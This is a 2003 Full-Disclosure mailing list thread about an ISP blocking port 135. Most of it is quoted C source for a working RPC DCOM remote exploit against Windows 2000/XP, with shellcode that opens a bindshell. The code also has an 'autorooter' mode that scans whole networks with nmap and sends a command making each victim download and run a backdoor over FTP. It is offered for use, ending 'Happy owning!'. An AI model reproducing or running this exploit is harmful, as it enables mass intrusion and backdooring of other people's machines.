| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: volkam at comcast.net (Anthony Clark)
Subject: Cox is blocking port 135 - off topic
Here is a couple different dcom utilities around town...
-Anthony
----- Original Message -----
From: "harq deman" <harqman@...penworld.com>
To: "Anthony Clark" <volkam@...cast.net>
Sent: Sunday, August 10, 2003 7:22 PM
Subject: Re: [Full-Disclosure] Cox is blocking port 135 - off topic
> That code got filled with CRLF's.. can you attach the .c please?
>
>
> ----- Original Message -----
> From: "Anthony Clark" <volkam@...cast.net>
> To: <full-disclosure@...ts.netsys.com>
> Sent: Monday, August 11, 2003 12:42 AM
> Subject: Re: [Full-Disclosure] Cox is blocking port 135 - off topic
>
>
> > Right..
> >
> > /* Windows 2003 <= remote RPC DCOM exploit
> > * Coded by .:[oc192.us]:. Security
> > * Modified by rogers@...et
> > *
> > * Features:
> > *
> > * -d destination host to attack.
> > *
> > * -p for port selection as exploit works on ports other than
> > 135(139,445,539 etc)
> > *
> > * -r for using a custom return address.
> > *
> > * -t to select target type (Offset) , this includes universal offsets
> for -
> > * win2k and winXP (Regardless of service pack)
> > *
> > * -l to select bindshell port on remote machine (Default: 666)
> > *
> > * - Shellcode has been modified to call ExitThread, rather than
> > ExitProcess, thus
> > * preventing crash of RPC service on remote machine.
> > *
> > * Modification:
> > *
> > * AUTOROOTER
> > *
> > * Modify the commands in *cmd, in void con(int sockfd){} 3rd line
> > * I suggest having it ftp to a box and download a backdoor, run it,
then
> > exit.
> > *
> > * Works well with this class C (B /16 or A /8 as well) command line
> scanner
> > using nmap:
> > *
> > * /usr/bin/nmap -sS -p 135 -oG out $1/24
> > * for i in `cat out | grep open | awk '{print $2}'`; do
> > * ./rogers-oc192-dcom -d $i -t 1&
> > * ./rogers-oc192-dcom -d $i -t 0&
> > * done
> > *
> > *
> > * sh scan.sh 10.10.2.0
> > *
> > * Happy owning!
> > */
> >
> > #include <stdio.h>
> > #include <stdlib.h>
> > #include <sys/types.h>
> > #include <sys/socket.h>
> > #include <netinet/in.h>
> > #include <arpa/inet.h>
> > #include <unistd.h>
> > #include <netdb.h>
> > #include <fcntl.h>
> > #include <unistd.h>
> >
> > /* xfocus start */
> > unsigned char bindstr[]={
> >
>
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0
> > x00,
> >
>
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0
> > x00,
> >
>
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0
> > x46,0x00,0x00,0x00,0x00,
> > 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
> > 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
> >
> > unsigned char request1[]={
> > 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
> >
>
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,
> > 0x00
> >
>
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,
> > 0x45
> >
>
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,
> > 0x5E
> >
>
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,
> > 0x4D
> >
>
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,
> > 0x41
> >
>
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,
> > 0x00
> >
>
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,
> > 0x45
> >
>
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,
> > 0x03
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,
> > 0x00
> >
>
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,
> > 0x29
> >
>
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,
> > 0x00
> >
>
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,
> > 0x00
> >
>
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,
> > 0x10
> >
>
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,
> > 0xFF
> >
>
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
> > 0x10
> >
>
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,
> > 0x09
> >
>
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,
> > 0x00
> >
>
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,
> > 0x00
> >
>
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,
> > 0x00
> >
>
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,
> > 0x00
> >
>
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,
> > 0x01
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,
> > 0x03
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,
> > 0x00
> >
>
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,
> > 0x0E
> >
>
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,
> > 0x00
> >
>
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,
> > 0x00
> >
>
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,
> > 0x00
> >
>
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,
> > 0x00
> >
>
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,
> > 0x00
> > ,0x00,0x00,0x00,0x00,0x00,0x00};
> >
> > unsigned char request2[]={
> > 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
> > ,0x00,0x00,0x5C,0x00,0x5C,0x00};
> >
> > unsigned char request3[]={
> > 0x5C,0x00
> >
>
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,
> > 0x00
> >
>
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
> > 0x00
> >
>
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
> > 0x00
> > ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
> > /* end xfocus */
> >
> > int type=0;
> > struct
> > {
> > char *os;
> > u_long ret;
> > }
> > targets[] =
> > {
> > { "[Win2k-Universal]", 0x0018759F },
> > { "[WinXP-Universal]", 0x0100139d },
> > }, v;
> >
> >
> > void usage(char *prog)
> > {
> > int i;
> > printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n");
> > printf("\nModified by rogers@...et bling bling\n\n");
> > printf("Usage:\n\n");
> > printf("%s -d <host> [options]\n", prog);
> > printf("Options:\n");
> > printf(" -d: Hostname to attack [Required]\n");
> > printf(" -t: Type [Default: 0]\n");
> > printf(" -r: Return address [Default: Selected from
> > target]\n");
> > printf(" -p: Attack port [Default: 135]\n");
> > printf(" -l: Bindshell port [Default: 666]\n\n");
> > printf("Types:\n");
> > for(i = 0; i < sizeof(targets)/sizeof(v); i++)
> > printf(" %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
> > exit(0);
> > }
> >
> > unsigned char sc[]=
> > "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
> > "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
> > "\x46\x00\x58\x00\x46\x00\x58\x00"
> >
> > "\xff\xff\xff\xff" /* return address */
> >
> > "\xcc\xe0\xfd\x7f" /* primary thread data block */
> > "\xcc\xe0\xfd\x7f" /* primary thread data block */
> >
> > /* bindshell no RPC crash, defineable spawn port */
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
> > "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
> > "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
> > "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
> > "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
> > "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
> > "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
> > "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
> > "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
> > "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
> > "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
> > "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
> > "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
> > "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
> > "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
> > "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
> > "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
> > "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
> > "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
> > "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
> > "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
> > "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
> > "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
> > "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
> > "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
> > "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
> > "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
> > "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
> > "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
> > "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
> > "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
> > "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
> >
> > /* xfocus start */
> > unsigned char request4[]={
> > 0x01,0x10
> >
>
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,
> > 0x00
> >
>
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,
> > 0x8C
> > ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
> > };
> > /* end xfocus */
> >
> > /* Not ripped from teso =) */
> > void con(int sockfd)
> > {
> >
> > /* Modify the cmdline here, make sure leave exit\n or else it wont work
:D
> > */
> >
> > char rb[1500], *cmd="echo open ip>>o&echo test>>o&echo test>>o&echo
user
> > test test>>o&echo bin>>o&echo get dllreg.exe>>o&echo
> > bye>>o&ftp -s:o&dllreg.exe&del o&echo test&exit\n";
> > fd_set fdreadme;
> > int i;
> >
> > FD_ZERO(&fdreadme);
> > FD_SET(sockfd, &fdreadme);
> > FD_SET(0, &fdreadme);
> >
> > /* Write our commands to the shell */
> >
> > send(sockfd, cmd, strlen(cmd), 0);
> >
> > while(1)
> > {
> > FD_SET(sockfd, &fdreadme);
> > FD_SET(0, &fdreadme);
> > if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break;
> > if(FD_ISSET(sockfd, &fdreadme))
> > {
> > if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0)
> > {
> > printf("[-] Connection lost..\n");
> > exit(1);
> > }
> > if(write(1, rb, i) < 0) break;
> > }
> >
> > if(FD_ISSET(0, &fdreadme))
> > {
> > if((i = read(0, rb, sizeof(rb))) < 0)
> > {
> > printf("[-] Connection lost..\n");
> > exit(1);
> > }
> > if (send(sockfd, rb, i, 0) < 0) break;
> > }
> >
> > /* exit after a pause */
> >
> > usleep(10000);
> > exit(0);
> > }
> >
> > printf("[-] Connection closed by foreign host..\n");
> >
> > exit(0);
> > }
> >
> > int main(int argc, char **argv)
> > {
> > int len, len1, sockfd, c, a;
> > unsigned long ret;
> > unsigned short port = 135;
> > unsigned char buf1[0x1000];
> > unsigned char buf2[0x1000];
> > unsigned short lportl=666; /* drg */
> > char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
> > struct hostent *he;
> > struct sockaddr_in their_addr;
> > static char *hostname=NULL;
> >
> > if(argc<2)
> > {
> > usage(argv[0]);
> > }
> >
> > while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF)
> > {
> > switch (c)
> > {
> > case 'd':
> > hostname = optarg;
> > break;
> > case 't':
> > type = atoi(optarg);
> > if((type > 1) || (type < 0))
> > {
> > printf("[-] Select a valid target:\n");
> > for(a = 0; a < sizeof(targets)/sizeof(v); a++)
> > printf(" %d [0x%.8x]: %s\n", a, targets[a].ret,
> > targets[a].os);
> > return 1;
> > }
> > break;
> > case 'r':
> > targets[type].ret = strtoul(optarg, NULL, 16);
> > break;
> > case 'p':
> > port = atoi(optarg);
> > if((port > 65535) || (port < 1))
> > {
> > printf("[-] Select a port between 1-65535\n");
> > return 1;
> > }
> > break;
> > case 'l':
> > lportl = atoi(optarg);
> > if((port > 65535) || (port < 1))
> > {
> > printf("[-] Select a port between 1-65535\n");
> > return 1;
> > }
> > break;
> > default:
> > usage(argv[0]);
> > return 1;
> > }
> > }
> >
> > if(hostname==NULL)
> > {
> > printf("[-] Please enter a hostname with -d\n");
> > exit(1);
> > }
> >
> > printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n");
> > printf("[+] Resolving host..\n");
> >
> > if((he = gethostbyname(hostname)) == NULL)
> > {
> > printf("[-] gethostbyname: Couldnt resolve hostname\n");
> > exit(1);
> > }
> >
> > printf("[+] Done.\n");
> >
> > printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n",
> > targets[type].os, hostname, port, lportl,
> targets[type].ret);
> >
> > /* drg */
> > lportl=htons(lportl);
> > memcpy(&lport[1], &lportl, 2);
> > *(long*)lport = *(long*)lport ^ 0x9432BF80;
> > memcpy(&sc[471],&lport,4);
> >
> > memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);
> >
> > their_addr.sin_family = AF_INET;
> > their_addr.sin_addr = *((struct in_addr *)he->h_addr);
> > their_addr.sin_port = htons(port);
> >
> > if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
> > {
> > perror("[-] Socket failed");
> > return(0);
> > }
> >
> > if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct
> > sockaddr)) == -1)
> > {
> > perror("[-] Connect failed");
> > return(0);
> > }
> >
> > /* xfocus start */
> > len=sizeof(sc);
> > memcpy(buf2,request1,sizeof(request1));
> > len1=sizeof(request1);
> >
> > *(unsigned long *)(request2)=*(unsigned long
> *)(request2)+sizeof(sc)/2;
> > *(unsigned long *)(request2+8)=*(unsigned long
> > *)(request2+8)+sizeof(sc)/2;
> >
> > memcpy(buf2+len1,request2,sizeof(request2));
> > len1=len1+sizeof(request2);
> > memcpy(buf2+len1,sc,sizeof(sc));
> > len1=len1+sizeof(sc);
> > memcpy(buf2+len1,request3,sizeof(request3));
> > len1=len1+sizeof(request3);
> > memcpy(buf2+len1,request4,sizeof(request4));
> > len1=len1+sizeof(request4);
> >
> > *(unsigned long *)(buf2+8)=*(unsigned long
*)(buf2+8)+sizeof(sc)-0xc;
> >
> >
> > *(unsigned long *)(buf2+0x10)=*(unsigned long
> > *)(buf2+0x10)+sizeof(sc)-0xc;
> > *(unsigned long *)(buf2+0x80)=*(unsigned long
> > *)(buf2+0x80)+sizeof(sc)-0xc;
> > *(unsigned long *)(buf2+0x84)=*(unsigned long
> > *)(buf2+0x84)+sizeof(sc)-0xc;
> > *(unsigned long *)(buf2+0xb4)=*(unsigned long
> > *)(buf2+0xb4)+sizeof(sc)-0xc;
> > *(unsigned long *)(buf2+0xb8)=*(unsigned long
> > *)(buf2+0xb8)+sizeof(sc)-0xc;
> > *(unsigned long *)(buf2+0xd0)=*(unsigned long
> > *)(buf2+0xd0)+sizeof(sc)-0xc;
> > *(unsigned long *)(buf2+0x18c)=*(unsigned long
> > *)(buf2+0x18c)+sizeof(sc)-0xc;
> > /* end xfocus */
> >
> >
> > if (send(sockfd,bindstr,sizeof(bindstr),0)== -1)
> > {
> > perror("[-] Send failed");
> > return(0);
> > }
> > len=recv(sockfd, buf1, 1000, 0);
> >
> > if (send(sockfd,buf2,len1,0)== -1)
> > {
> > perror("[-] Send failed");
> > return(0);
> > }
> > close(sockfd);
> > sleep(1);
> >
> > their_addr.sin_family = AF_INET;
> > their_addr.sin_addr = *((struct in_addr *)he->h_addr);
> > their_addr.sin_port = lportl;
> >
> > if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
> > {
> > perror("[-] Socket failed");
> > return(0);
> > }
> >
> > if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct
> > sockaddr)) == -1)
> > {
> > printf("[-] Couldnt connect to bindshell, possible reasons:\n");
> > printf(" 1: Host is firewalled\n");
> > printf(" 2: Exploit failed\n");
> > return(0);
> > }
> >
> > printf("[+] Connected to bindshell..\n\n");
> >
> > sleep(1);
> >
> > con(sockfd);
> >
> > return(0);
> > }
> > ----- Original Message -----
> > From: "Joey" <joey2cool@...oo.com>
> > To: <full-disclosure@...ts.netsys.com>
> > Sent: Sunday, August 10, 2003 3:21 PM
> > Subject: Re: [Full-Disclosure] Cox is blocking port 135 - off topic
> >
> >
> > > cox does block port 445 also, but i havent seen any
> > > exploits that use that port. even though its said that
> > > port 445 is vulnerable, where is the POC?
> > >
> > > --- Kurt Seifried <listuser@...fried.org> wrote:
> > > > Off topic:
> > > >
> > > > This won't help much at all. Windows 2000/XP run
> > > > Microsoft SMB over TCP on
> > > > 445 as well (reduced overhead then 135/etc, no
> > > > NetBIOS layer). When a client
> > > > tries to connect to a remote host for file/print
> > > > sharing/etc it connects on
> > > > both ports 135 and 445, if a response is recieved
> > > > from port 445 it drops the
> > > > connection to 135. THe attack works quite well
> > > > against client systems using
> > > > port 445. If Cox blocks both ports 135 and 445 that
> > > > will be semi-effective
> > > > (except of course for internal users who spread a
> > > > worm/etc, such as laptops
> > > > that move around). THis may block a few of the more
> > > > stupid attacks but not
> > > > for long.
> > > >
> > > > Kurt Seifried, kurt@...fried.org
> > > > A15B BEE5 B391 B9AD B0EF
> > > > AEB0 AD63 0B4E AD56 E574
> > > > http://seifried.org/security/
> > > >
> > >
> > >
> > > __________________________________
> > > Do you Yahoo!?
> > > Yahoo! SiteBuilder - Free, easy-to-use web site design software
> > > http://sitebuilder.yahoo.com
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: vdcom.tar.gz
Type: application/octet-stream
Size: 4982 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030810/80882da1/vdcom.tar.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: oc192-dcom.c
Type: application/octet-stream
Size: 16438 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030810/80882da1/oc192-dcom.obj
-------------- next part --------------
A non-text attachment was scrubbed...
Name: rogers-oc192.c
Type: application/octet-stream
Size: 17481 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030810/80882da1/rogers-oc192.obj
Powered by blists - more mailing lists